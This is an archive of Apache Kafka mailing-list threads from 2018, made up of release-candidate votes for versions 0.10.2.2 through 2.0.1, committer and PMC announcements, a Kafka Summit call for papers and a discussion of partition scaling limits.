> You can download the source and binary release (Scala 2.11 and Scala 2.12)
> from:
> https://kafka.apache.org/downloads#2.0.1
>
> 
> ---
>
>
> Apache Kafka is a distributed streaming platform with four core APIs:
>
>
> ** The Producer API allows an application to publish a stream of records to
> one or more Kafka topics.
>
> ** The Consumer API allows an application to subscribe to one or more
> topics and process the stream of records produced to them.
>
> ** The Streams API allows an application to act as a stream processor,
> consuming an input stream from one or more topics and producing an
> output stream to one or more output topics, effectively transforming the
> input streams to output streams.
>
> ** The Connector API allows building and running reusable producers or
> consumers that connect Kafka topics to existing applications or data
> systems. For example, a connector to a relational database might
> capture every change to a table.
>
>
> With these APIs, Kafka can be used for two broad classes of application:
>
> ** Building real-time streaming data pipelines that reliably get data
> between systems or applications.
>
> ** Building real-time streaming applications that transform or react
> to the streams of data.
>
>
> Apache Kafka is in use at large and small companies worldwide, including
> Capital One, Goldman Sachs, ING, LinkedIn, Netflix, Pinterest, Rabobank,
> Target, The New York Times, Uber, Yelp, and Zalando, among others.
>
> A big thank you to the following 40 contributors to this release!
>
> Amit Sela, Anna Povzner, Arjun Satish, Bibin Sebastian, Bill Bejeck, Bob
> Barrett, Bridger Howell,
> Colin Hicks, Dhruvil Shah, Dong Lin, Flavien Raynaud, Guozhang Wang, huxi,
> huxihx, Ismael Juma,
> Jason Gustafson, Joan Goyeau, John Roesler, Jon Lee, Kamal Chandraprakash,
> Kevin Lafferty,
> Konstantine Karantasis, lambdaliu, Lincong Li, Lucas Wang, Maciej Bryński,
> Manikumar Reddy,
> Matthias J. Sax, Max Zheng, Michal Dziemianko, Michał Borowiecki,
> radai-rosenblatt, Rajini Sivaram,
> Randall Hauch, Robert Yokota, Simon Clark, Stanislav Kozlovski, Sébastien
> Launay, tedyu,
> Zhanxiang (Patrick) Huang
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> https://kafka.apache.org/
>
> Thank you!
>
> Regards,
> Manikumar
>


Re: [kafka-clients] [VOTE] 2.0.1 RC0

2018-11-05 Thread Jun Rao
Hi, Mani,

Thanks for running the release. Verified quickstart on 2.12 binary. +1

Jun

On Thu, Oct 25, 2018 at 7:28 PM, Manikumar 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the first candidate for release of Apache Kafka 2.0.1.
>
> This is a bug fix release closing 49 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+2.0.1
>
> Release notes for the 2.0.1 release:
> http://home.apache.org/~manikumar/kafka-2.0.1-rc0/RELEASE_NOTES.html
>
> *** Please download, test and vote by  Tuesday, October 30, end of day
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~manikumar/kafka-2.0.1-rc0/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~manikumar/kafka-2.0.1-rc0/javadoc/
>
> * Tag to be voted upon (off 2.0 branch) is the 2.0.1 tag:
> https://github.com/apache/kafka/releases/tag/2.0.1-rc0
>
> * Documentation:
> http://kafka.apache.org/20/documentation.html
>
> * Protocol:
> http://kafka.apache.org/20/protocol.html
>
> * Successful Jenkins builds for the 2.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-2.0-jdk8/177/
>
> /**
>
> Thanks,
> Manikumar
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAMVt_AxtMfs6EUqHruCTcq%3DL5A9Wn0YdpXmDbaX-C%2Bvqsrdk%
> 3DQ%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>


Re: [ANNOUNCE] New Committer: Manikumar Reddy

2018-10-11 Thread Jun Rao
Congratulations, Mani!

Jun

On Thu, Oct 11, 2018 at 10:39 AM, Jason Gustafson 
wrote:

> Hi all,
>
> The PMC for Apache Kafka has invited Manikumar Reddy as a committer and we
> are
> pleased to announce that he has accepted!
>
> Manikumar has contributed 134 commits including significant work to add
> support for delegation tokens in Kafka:
>
> KIP-48:
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-48+Delegation+token+support+for+Kafka
> KIP-249:
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-249%3A+Add+Delegation+Token+Operations+to+KafkaAdminClient
>
> He has broad experience working with many of the core components in Kafka
> and he has reviewed over 80 PRs. He has also made huge progress addressing
> some of our technical debt.
>
> We appreciate the contributions and we are looking forward to more.
> Congrats Manikumar!
>
> Jason, on behalf of the Apache Kafka PMC
>


Re: [kafka-clients] [VOTE] 1.0.2 RC1

2018-07-02 Thread Jun Rao
Hi, Matthias,

Thanks for running the release. Verified quickstart on the scala 2.12
binary. +1

Jun

On Fri, Jun 29, 2018 at 10:02 PM, Matthias J. Sax 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second candidate for release of Apache Kafka 1.0.2.
>
> This is a bug fix release addressing 27 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+1.0.2
>
> Release notes for the 1.0.2 release:
> http://home.apache.org/~mjsax/kafka-1.0.2-rc1/RELEASE_NOTES.html
>
> *** Please download, test and vote by end of next week (7/6/18).
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~mjsax/kafka-1.0.2-rc1/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~mjsax/kafka-1.0.2-rc1/javadoc/
>
> * Tag to be voted upon (off 1.0 branch) is the 1.0.2 tag:
> https://github.com/apache/kafka/releases/tag/1.0.2-rc1
>
> * Documentation:
> http://kafka.apache.org/10/documentation.html
>
> * Protocol:
> http://kafka.apache.org/10/protocol.html
>
> * Successful Jenkins builds for the 1.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-1.0-jdk7/214/
> System tests:
> https://jenkins.confluent.io/job/system-test-kafka/job/1.0/225/
>
> /**
>
> Thanks,
>   -Matthias
>
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/ca183ad4-9285-e423-3850-261f9dfec044%40confluent.io.
> For more options, visit https://groups.google.com/d/optout.
>


Re: [kafka-clients] [VOTE] 1.1.1 RC2

2018-06-29 Thread Jun Rao
Hi, Dong,

Thanks for running the release. Verified quickstart on scala 2.12 binary. +1

Jun

On Thu, Jun 28, 2018 at 6:12 PM, Dong Lin  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second candidate for release of Apache Kafka 1.1.1.
>
> Apache Kafka 1.1.1 is a bug-fix release for the 1.1 branch that was first
> released with 1.1.0 about 3 months ago. We have fixed about 25 issues since
> that release. A few of the more significant fixes include:
>
> KAFKA-6925  - Fix
> memory leak in StreamsMetricsThreadImpl
> KAFKA-6937  - In-sync
> replica delayed during fetch if replica throttle is exceeded
> KAFKA-6917  - Process
> txn completion asynchronously to avoid deadlock
> KAFKA-6893  - Create
> processors before starting acceptor to avoid ArithmeticException
> KAFKA-6870  -
> Fix ConcurrentModificationException in SampledStat
> KAFKA-6878  - Fix
> NullPointerException when querying global state store
> KAFKA-6879  - Invoke
> session init callbacks outside lock to avoid Controller deadlock
> KAFKA-6857  - Prevent
> follower from truncating to the wrong offset if undefined leader epoch is
> requested
> KAFKA-6854  - Log
> cleaner fails with transaction markers that are deleted during clean
> KAFKA-6747  - Check
> whether there is in-flight transaction before aborting transaction
> KAFKA-6748  - Double
> check before scheduling a new task after the punctuate call
> KAFKA-6739  -
> Fix IllegalArgumentException when down-converting from V2 to V0/V1
> KAFKA-6728  -
> Fix NullPointerException when instantiating the HeaderConverter
>
> Kafka 1.1.1 release plan:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+1.1.1
>
> Release notes for the 1.1.1 release:
> http://home.apache.org/~lindong/kafka-1.1.1-rc2/RELEASE_NOTES.html
>
> *** Please download, test and vote by Thursday, July 3, 12pm PT ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~lindong/kafka-1.1.1-rc2/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~lindong/kafka-1.1.1-rc2/javadoc/
>
> * Tag to be voted upon (off 1.1 branch) is the 1.1.1-rc2 tag:
> https://github.com/apache/kafka/tree/1.1.1-rc2
>
> * Documentation:
> http://kafka.apache.org/11/documentation.html
>
> * Protocol:
> http://kafka.apache.org/11/protocol.html
>
> * Successful Jenkins builds for the 1.1 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-1.1-jdk7/157/
> System tests: https://jenkins.confluent.io/job/system-test-kafka-branch-builder/1817
>
>
> Please test and verify the release artifacts and submit a vote for this RC,
> or report any issues so we can fix them and get a new RC out ASAP. Although
> this release vote requires PMC votes to pass, testing, votes, and bug
> reports are valuable and appreciated from everyone.
>
>
> Regards,
> Dong
>
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAAaarBb1KsyD_KLuz6V4pfKQiUNQFLb9Lb_eNU%
> 2BsWjd7Vr%2B_%2Bw%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>


Re: [kafka-clients] [VOTE] 0.11.0.3 RC0

2018-06-29 Thread Jun Rao
Hi, Matthias,

Thanks for running the release. Verified quickstart on scala 2.12 binary. +1

Jun

On Fri, Jun 22, 2018 at 3:14 PM, Matthias J. Sax 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the first candidate for release of Apache Kafka 0.11.0.3.
>
> This is a bug fix release closing 27 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+0.11.0.3
>
> Release notes for the 0.11.0.3 release:
> http://home.apache.org/~mjsax/kafka-0.11.0.3-rc0/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, 6/26/18 end-of-day, so we
> can close the vote on Wednesday.
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~mjsax/kafka-0.11.0.3-rc0/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~mjsax/kafka-0.11.0.3-rc0/javadoc/
>
> * Tag to be voted upon (off 0.11.0 branch) is the 0.11.0.3 tag:
> https://github.com/apache/kafka/releases/tag/0.11.0.3-rc0
>
> * Documentation:
> http://kafka.apache.org/0110/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0110/protocol.html
>
> * Successful Jenkins builds for the 0.11.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-0.11.0-jdk7/385/
> System tests:
> https://jenkins.confluent.io/job/system-test-kafka/job/0.11.0/217/
>
> /**
>
> Thanks,
>   -Matthias
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/2f54734a-8e8d-3cd7-060b-5f2b3010a20e%40confluent.io.
> For more options, visit https://groups.google.com/d/optout.
>


Re: [kafka-clients] [VOTE] 0.10.2.2 RC1

2018-06-29 Thread Jun Rao
Hi, Matthias,

Thanks for running the release. Verified quickstart on scala 2.12 binary. +1

Jun

On Fri, Jun 22, 2018 at 6:43 PM, Matthias J. Sax 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second candidate for release of Apache Kafka 0.10.2.2.
>
> Note, that RC0 was created before the upgrade to Gradle 4.8.1 and thus,
> we discarded it in favor of RC1 (without sending out a email for RC0).
>
> This is a bug fix release closing 29 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+0.10.2.2
>
> Release notes for the 0.10.2.2 release:
> http://home.apache.org/~mjsax/kafka-0.10.2.2-rc1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, 6/26/18 end-of-day, so we
> can close the vote on Wednesday.
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~mjsax/kafka-0.10.2.2-rc1/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~mjsax/kafka-0.10.2.2-rc1/javadoc/
>
> * Tag to be voted upon (off 0.10.2 branch) is the 0.10.2.2 tag:
> https://github.com/apache/kafka/releases/tag/0.10.2.2-rc1
>
> * Documentation:
> http://kafka.apache.org/0102/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0102/protocol.html
>
> * Successful Jenkins builds for the 0.10.2 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-0.10.2-jdk7/220/
>
> /**
>
> Thanks,
>   -Matthias
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/8228115e-6913-5c37-06d9-7410a7bd7f69%40confluent.io.
> For more options, visit https://groups.google.com/d/optout.
>


CFP: Kafka Summit San Francisco, 2018

2018-05-08 Thread Jun Rao
Hi, Everyone,

Just want to let you know that Kafka Summit San Francisco, 2018 is open for
submissions. The deadline for submission is Jun. 16. The conference itself
will be held on Oct. 16 - Oct. 17.

More details can be found at
https://kafka-summit.org/kafka-summit-san-francisco-2018/speakers/

Thanks,

Jun


Re: [kafka-clients] Re: [VOTE] 1.1.0 RC4

2018-03-27 Thread Jun Rao
Hi, Rajini,

Thanks for running the release. Verified quickstart on scala 2.11 binary.
+1

Jun


On Tue, Mar 27, 2018 at 6:22 AM, Rajini Sivaram 
wrote:

> Can we get some more votes for this RC so that the release can be rolled
> out soon?
>
> Many thanks,
>
> Rajini
>
> On Sat, Mar 24, 2018 at 6:54 PM, Ted Yu  wrote:
>
>> I wasn't able to reproduce the test failure when it is run alone.
>>
>> This seems to be a flaky test.
>>
>> +1 from me.
>>
>> On Sat, Mar 24, 2018 at 11:49 AM, Rajini Sivaram <rajinisiva...@gmail.com>
>> wrote:
>>
>> > Hi Ted,
>> >
>> > Thank you for testing the RC. I haven't been able to recreate that
>> failure
>> > after running the test a 100 times. Was it a one-off transient failure
>> or
>> > does it fail consistently for you?
>> >
>> >
>> > On Sat, Mar 24, 2018 at 2:51 AM, Ted Yu  wrote:
>> >
>> > > When I ran test suite, I got one failure:
>> > >
>> > > kafka.api.PlaintextConsumerTest > testAsyncCommit FAILED
>> > > java.lang.AssertionError: expected:<5> but was:<1>
>> > > at org.junit.Assert.fail(Assert.java:88)
>> > > at org.junit.Assert.failNotEquals(Assert.java:834)
>> > > at org.junit.Assert.assertEquals(Assert.java:645)
>> > > at org.junit.Assert.assertEquals(Assert.java:631)
>> > > at kafka.api.BaseConsumerTest.awaitCommitCallback(BaseConsumerTest.scala:214)
>> > > at kafka.api.PlaintextConsumerTest.testAsyncCommit(PlaintextConsumerTest.scala:513)
>> > >
>> > > Not sure if anyone else saw similar error.
>> > >
>> > > Cheers
>> > >
>> > > On Fri, Mar 23, 2018 at 4:37 PM, Rajini Sivaram <
>> rajinisiva...@gmail.com
>> > >
>> > > wrote:
>> > >
>> > > > Hello Kafka users, developers and client-developers,
>> > > >
>> > > > This is the fifth candidate for release of Apache Kafka 1.1.0.
>> > > >
>> > > > https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=75957546
>> > > >
>> > > > A few highlights:
>> > > >
>> > > > * Significant Controller improvements (much faster and session
>> > > > expiration edge cases fixed)
>> > > > * Data balancing across log directories (JBOD)
>> > > > * More efficient replication when the number of partitions is large
>> > > > * Dynamic Broker Configs
>> > > > * Delegation tokens (KIP-48)
>> > > > * Kafka Streams API improvements (KIP-205 / 210 / 220 / 224 / 239)
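
Of the highlights above, dynamic broker configs are perhaps the easiest to
try out from the command line. A sketch, assuming a broker with id 0
listening on localhost (the config key is just an example of a dynamically
updatable one):

    bin/kafka-configs.sh --bootstrap-server localhost:9092 --entity-type brokers \
        --entity-name 0 --alter --add-config log.cleaner.threads=2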
>> > > >
>> > > > Release notes for the 1.1.0 release:
>> > > >
>> > > > http://home.apache.org/~rsivaram/kafka-1.1.0-rc4/RELEASE_NOTES.html
>> > > >
>> > > >
>> > > > *** Please download, test and vote by Tuesday March 27th 4pm PT.
>> > > >
>> > > >
>> > > > Kafka's KEYS file containing PGP keys we use to sign the release:
>> > > >
>> > > > http://kafka.apache.org/KEYS
>> > > >
>> > > >
>> > > > * Release artifacts to be voted upon (source and binary):
>> > > >
>> > > > http://home.apache.org/~rsivaram/kafka-1.1.0-rc4/
>> > > >
>> > > >
>> > > > * Maven artifacts to be voted upon:
>> > > >
>> > > > https://repository.apache.org/content/groups/staging/
>> > > >
>> > > >
>> > > > * Javadoc:
>> > > >
>> > > > http://home.apache.org/~rsivaram/kafka-1.1.0-rc4/javadoc/
>> > > >
>> > > >
>> > > > * Tag to be voted upon (off 1.1 branch) is the 1.1.0 tag:
>> > > >
>> > > > https://github.com/apache/kafka/tree/1.1.0-rc4
>> > > >
>> > > >
>> > > >
>> > > > * Documentation:
>> > > >
>> > > > http://kafka.apache.org/11/documentation.html
>> > > >
>> > > >
>> > > > * Protocol:
>> > > >
>> > > > http://kafka.apache.org/11/protocol.html
>> > > >
>> > > >
>> > > >
>> > > > Thanks,
>> > > >
>> > > >
>> > > > Rajini
>> > > >
>> > >
>> >
>>
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAOJcB3_6Eyr9knQZ6Sg%2BqyDbAizyqTNcbR%
> 3D7R_%2BA%2BD8c_VWeKg%40mail.gmail.com
> 
> .
>
> For more options, visit https://groups.google.com/d/optout.
>


Re: [kafka-clients] Re: [VOTE] 1.1.0 RC0

2018-03-01 Thread Jun Rao
KAFKA-6111 is now merged to the 1.1 branch.

Thanks,

Jun

On Thu, Mar 1, 2018 at 2:50 PM, Jun Rao <j...@confluent.io> wrote:

> Hi, Damian,
>
> It would also be useful to include KAFKA-6111, which prevents the
> deleteLogDirEventNotifications path from being deleted correctly in
> Zookeeper. The patch should be committed later today.
>
> Thanks,
>
> Jun
>
> On Thu, Mar 1, 2018 at 1:47 PM, Damian Guy <damian@gmail.com> wrote:
>
>> Thanks Jason. Assuming the system tests pass i'll cut RC1 tomorrow.
>>
>> Thanks,
>> Damian
>>
>> On Thu, 1 Mar 2018 at 19:10 Jason Gustafson <ja...@confluent.io> wrote:
>>
>>> The fix has been merged to 1.1.
>>>
>>> Thanks,
>>> Jason
>>>
>>> On Wed, Feb 28, 2018 at 11:35 AM, Damian Guy <damian@gmail.com>
>>> wrote:
>>>
>>> > Hi Jason,
>>> >
>>> > Ok - thanks. Let me know how you get on.
>>> >
>>> > Cheers,
>>> > Damian
>>> >
>>> > On Wed, 28 Feb 2018 at 19:23 Jason Gustafson <ja...@confluent.io>
>>> wrote:
>>> >
>>> > > Hey Damian,
>>> > >
>>> > > I think we should consider
>>> > > https://issues.apache.org/jira/browse/KAFKA-6593
>>> > > for the release. I have a patch available, but still working on
>>> > validating
>>> > > both the bug and the fix.
>>> > >
>>> > > -Jason
>>> > >
>>> > > On Wed, Feb 28, 2018 at 9:34 AM, Matthias J. Sax <
>>> matth...@confluent.io>
>>> > > wrote:
>>> > >
>>> > > > No. Both will be released.
>>> > > >
>>> > > > -Matthias
>>> > > >
>>> > > > On 2/28/18 6:32 AM, Marina Popova wrote:
>>> > > > > Sorry, maybe a stupid question, but:
>>> > > > >  I see that Kafka 1.0.1 RC2 is still not released, but now 1.1.0
>>> RC0
>>> > is
>>> > > > coming up...
>>> > > > > Does it mean 1.0.1 will be abandoned and we should be looking
>>> forward
>>> > > to
>>> > > > 1.1.0 instead?
>>> > > > >
>>> > > > > thanks!
>>> > > > >
>>> > > > > ​Sent with ProtonMail Secure Email.​
>>> > > > >
>>> > > > > ‐‐‐ Original Message ‐‐‐
>>> > > > >
>>> > > > > On February 26, 2018 6:28 PM, Vahid S Hashemian <
>>> > > > vahidhashem...@us.ibm.com> wrote:
>>> > > > >
>>> > > > >> +1 (non-binding)
>>> > > > >>
>>> > > > >> Built the source and ran quickstart (including streams)
>>> successfully
>>> > > on
>>> > > > >>
>>> > > > >> Ubuntu (with both Java 8 and Java 9).
>>> > > > >>
>>> > > > >> I understand the Windows platform is not officially supported,
>>> but I
>>> > > ran
>>> > > > >>
>>> > > > >> the same on Windows 10, and except for Step 7 (Connect)
>>> everything
>>> > > else
>>> > > > >>
>>> > > > >> worked fine.
>>> > > > >>
> >>> > > > >> There are a number of warnings and errors (including
>>> > > > >>
>>> > > > >> java.lang.ClassNotFoundException). Here's the final error
>>> message:
>>> > > > >>
> >>> > > > >>> bin\windows\connect-standalone.bat config\connect-standalone.properties
> >>> > > > >>> config\connect-file-source.properties config\connect-file-sink.properties
>>> > > > >>
>>> > > > >> ...
>>> > > > >>
>>> > > > >> \[2018-02-26 14:55:56,529\] ERROR Stopping after connector error
>>> > > > >>
>>> > > > >> (org.apache.kafka.connect.cli.ConnectStandalone)
>>> > > > >>
>>> > > > >> java.lang.NoClassDefFoundError:
>>> > > > >>
>>> > > > >> org

Re: [kafka-clients] Re: [VOTE] 1.1.0 RC0

2018-03-01 Thread Jun Rao
Hi, Damian,

It would also be useful to include KAFKA-6111, which prevents the
deleteLogDirEventNotifications path from being deleted correctly in
Zookeeper. The patch should be committed later today.

Thanks,

Jun
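
For anyone checking whether their cluster is affected, the znode in question
can be inspected with the bundled ZooKeeper shell. A sketch, assuming no
ZooKeeper chroot (the path name follows the Kafka source):

    bin/zookeeper-shell.sh localhost:2181 ls /log_dir_event_notification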

On Thu, Mar 1, 2018 at 1:47 PM, Damian Guy  wrote:

> Thanks Jason. Assuming the system tests pass i'll cut RC1 tomorrow.
>
> Thanks,
> Damian
>
> On Thu, 1 Mar 2018 at 19:10 Jason Gustafson  wrote:
>
>> The fix has been merged to 1.1.
>>
>> Thanks,
>> Jason
>>
>> On Wed, Feb 28, 2018 at 11:35 AM, Damian Guy 
>> wrote:
>>
>> > Hi Jason,
>> >
>> > Ok - thanks. Let me know how you get on.
>> >
>> > Cheers,
>> > Damian
>> >
>> > On Wed, 28 Feb 2018 at 19:23 Jason Gustafson 
>> wrote:
>> >
>> > > Hey Damian,
>> > >
>> > > I think we should consider
>> > > https://issues.apache.org/jira/browse/KAFKA-6593
>> > > for the release. I have a patch available, but still working on
>> > validating
>> > > both the bug and the fix.
>> > >
>> > > -Jason
>> > >
>> > > On Wed, Feb 28, 2018 at 9:34 AM, Matthias J. Sax <
>> matth...@confluent.io>
>> > > wrote:
>> > >
>> > > > No. Both will be released.
>> > > >
>> > > > -Matthias
>> > > >
>> > > > On 2/28/18 6:32 AM, Marina Popova wrote:
>> > > > > Sorry, maybe a stupid question, but:
>> > > > >  I see that Kafka 1.0.1 RC2 is still not released, but now 1.1.0
>> RC0
>> > is
>> > > > coming up...
>> > > > > Does it mean 1.0.1 will be abandoned and we should be looking
>> forward
>> > > to
>> > > > 1.1.0 instead?
>> > > > >
>> > > > > thanks!
>> > > > >
>> > > > > ​Sent with ProtonMail Secure Email.​
>> > > > >
>> > > > > ‐‐‐ Original Message ‐‐‐
>> > > > >
>> > > > > On February 26, 2018 6:28 PM, Vahid S Hashemian <
>> > > > vahidhashem...@us.ibm.com> wrote:
>> > > > >
>> > > > >> +1 (non-binding)
>> > > > >>
>> > > > >> Built the source and ran quickstart (including streams)
>> successfully
>> > > on
>> > > > >>
>> > > > >> Ubuntu (with both Java 8 and Java 9).
>> > > > >>
>> > > > >> I understand the Windows platform is not officially supported,
>> but I
>> > > ran
>> > > > >>
>> > > > >> the same on Windows 10, and except for Step 7 (Connect)
>> everything
>> > > else
>> > > > >>
>> > > > >> worked fine.
>> > > > >>
>> > > > >> There are a number of warnings and errors (including
>> > > > >>
>> > > > >> java.lang.ClassNotFoundException). Here's the final error
>> message:
>> > > > >>
>> > > > >>> bin\windows\connect-standalone.bat config\connect-standalone.properties
>> > > > >>> config\connect-file-source.properties config\connect-file-sink.properties
>> > > > >>
>> > > > >> ...
>> > > > >>
>> > > > >> [2018-02-26 14:55:56,529] ERROR Stopping after connector error
>> > > > >>
>> > > > >> (org.apache.kafka.connect.cli.ConnectStandalone)
>> > > > >>
>> > > > >> java.lang.NoClassDefFoundError:
>> > > > >>
>> > > > >> org/apache/kafka/connect/transforms/util/RegexValidator
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> org.apache.kafka.connect.runtime.SinkConnectorConfig.<
>> > > > clinit>(SinkConnectorConfig.java:46)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >>
>> > > > >> org.apache.kafka.connect.runtime.AbstractHerder.
>> > > > validateConnectorConfig(AbstractHerder.java:263)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> org.apache.kafka.connect.runtime.standalone.StandaloneHerder.
>> > > > putConnectorConfig(StandaloneHerder.java:164)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> org.apache.kafka.connect.cli.ConnectStandalone.main(
>> > > > ConnectStandalone.java:107)
>> > > > >>
>> > > > >> Caused by: java.lang.ClassNotFoundException:
>> > > > >>
>> > > > >> org.apache.kafka.connect.transforms.util.RegexValidator
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(
>> > > > BuiltinClassLoader.java:582)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.
>> > > > loadClass(ClassLoaders.java:185)
>> > > > >>
>> > > > >> at java.base/java.lang.ClassLoader.loadClass(
>> ClassLoader.java:496)
>> > > > >>
>> > > > >> ... 4 more
>> > > > >>
>> > > > >> Thanks for running the release.
>> > > > >>
>> > > > >> --Vahid
>> > > > >>
>> > > > >> From: Damian Guy damian@gmail.com
>> > > > >>
>> > > > >> To: d...@kafka.apache.org, users@kafka.apache.org,
>> > > > >>
>> > > > >> kafka-clie...@googlegroups.com
>> > > > >>
>> > > > >> Date: 02/24/2018 08:16 AM
>> > > > >>
>> > > > >> Subject: [VOTE] 1.1.0 RC0
>> > > > >>
>> > > > >> Hello Kafka users, developers and client-developers,
>> > > > >>
>> > > > >> This is the first candidate for release of Apache Kafka 1.1.0.
>> > > > >>
>> > > > >> This is a minor version release of Apache Kafka. It includes 29 new
>> > > KIPs.
>> > > > >>
>> > > > >> Please see the release plan for more details:
>> > > > >>
>> > > > >> 

Re: [ANNOUNCE] New Kafka PMC Member: Rajini Sivaram

2018-01-18 Thread Jun Rao
Congratulations, Rajini !

Jun

On Wed, Jan 17, 2018 at 10:48 AM, Gwen Shapira  wrote:

> Dear Kafka Developers, Users and Fans,
>
> Rajini Sivaram became a committer in April 2017.  Since then, she remained
> active in the community and contributed major patches, reviews and KIP
> discussions. I am glad to announce that Rajini is now a member of the
> Apache Kafka PMC.
>
> Congratulations, Rajini and looking forward to your future contributions.
>
> Gwen, on behalf of Apache Kafka PMC
>


Re: Kafka Replicated Partition Limits

2018-01-03 Thread Jun Rao
Hi, Andrey,

If the test is in the normal mode, it would be useful to figure out why ZK
is the bottleneck since the normal mode typically doesn't require ZK
accesses.

Thanks,

Jun

On Wed, Jan 3, 2018 at 3:00 PM, Andrey Falko <afa...@salesforce.com> wrote:

> Ben Wood:
> 1. We have 5 ZK nodes.
> 2. I only tracked outstanding requests thus far from ZK-side of
> things. At 9.5k topics, I recorded about 5k outstanding requests. I'll
> start tracking this better for my next run. Anything else worth
> tracking?
>
> Jun Rao:
> I'm testing the latest 1.0.0. I'm testing normal mode. I don't take
> anything down. I had a run where I tried to scale the brokers up, but
> it didn't improve things. Thanks for pointing me at the KIP!
>
> On Wed, Jan 3, 2018 at 2:50 PM, Jun Rao <j...@confluent.io> wrote:
> > Hi, Andrey,
> >
> > Thanks for reporting the results. Which version of Kafka are you testing?
> > Also, it would be useful to know if you are testing the normal mode when
> > all replicas are up and in sync, or the failure mode when some of the
> > replicas are being restarted. Typically, ZK is only accessed in the
> failure
> > mode.
> >
> > We have made some significant improvement in the failure mode by reducing
> > the logging overhead (KAFKA-6116) and making the ZK accesses async
> > (KAFKA-5642). These won't necessarily reduce the number of requests to
> ZK,
